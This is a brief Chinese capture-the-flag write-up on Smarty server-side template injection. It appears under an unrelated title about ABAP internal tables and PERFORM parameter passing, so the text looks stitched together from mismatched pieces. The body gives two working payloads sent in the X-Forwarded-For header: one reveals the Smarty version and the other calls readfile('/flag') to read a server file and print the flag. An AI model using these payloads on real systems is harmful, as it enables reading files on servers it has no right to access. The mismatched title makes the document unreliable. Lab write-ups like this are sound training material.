ABAP 内表定义精要与 PERFORM 参数传递实战解析
2026/6/11 13:36:59
打开题目,看到末尾
Build With Smarty !
推测 Smarty 模板注入 看了wphttps://blog.csdn.net/kw741951/article/details/141001010
smart是php的模板引擎,模板引擎的作用就是分离前端页面和数据的,题目中显示API的URL由于环境的原因无法使用,但我们的IP依旧显示在了页面的右上角,且根据它的提示XFF我们很容易想到,在X-Forwarded-For里构造ssti:payload。
开始用bp抓包,然后插入X-Forwarded-For:{$smarty.version}来看一下版本。
插入X-Forwarded-For:{if readfile('/flag')}{/if}
得到flag
flag{305f86a9-ae64-418f-8190-52dd563ee618}